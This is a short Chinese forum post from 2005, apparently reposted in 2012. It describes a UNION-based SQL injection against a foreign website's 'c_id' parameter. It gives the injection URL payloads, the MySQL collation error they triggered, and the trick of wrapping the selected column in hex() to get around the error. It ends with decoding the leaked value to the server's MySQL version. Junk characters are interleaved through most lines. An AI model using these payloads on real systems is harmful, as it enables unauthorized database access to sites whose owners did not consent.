本文作者:SuperHei, Y1 m! u1 \( l
文章性质:原创8 C( |" o* y: K
发布日期:2005-10-187 Q( |1 p, e9 Z7 W- r! \
测试个国外的站时:, ^& `7 ]3 M: `% [* }' G' S# y
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
( |& B! t9 e6 E! T9 W3 K! n" Z: l返回错误:
0 Q+ j# W% v6 F' k& ^2 _Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'2 C. w9 J8 k0 T% C
MySQL Error No. 126
+ _3 g2 W/ ]/ T7 c看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。) A. C( {1 M1 \$ K7 r; r
解决办法:转为其他编码如hex。$ R; F( [" w' y4 \2 P
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
/ M) t! Y n M9 d j6 R成功得到hex(version())的值为:
8 c) v5 s5 }8 O B( G342E312E332D62657461
9 ^ N" h- ]; S. z回Mysql查询下得到:
- U! u; `/ w0 qmysql> select 0x342E312E332D62657461;
5 O a: o" M Y/ d+------------------------+
; {6 A. J' s, [| 0x342E312E332D62657461 |3 |2 }6 b* D# Z# q
+------------------------+/ u: w( k2 H% q3 V2 f" `, O- T
| 4.1.3-beta |
8 G' o: O2 s" E$ Z. v+------------------------+
5 b4 j- X1 j5 o* H1 row in set (0.00 sec)% X6 b, \2 i1 |7 h: V
/ {: v( h5 n: L1 y
|
发表于 2012-9-15 14:04:54
收藏
支持
反对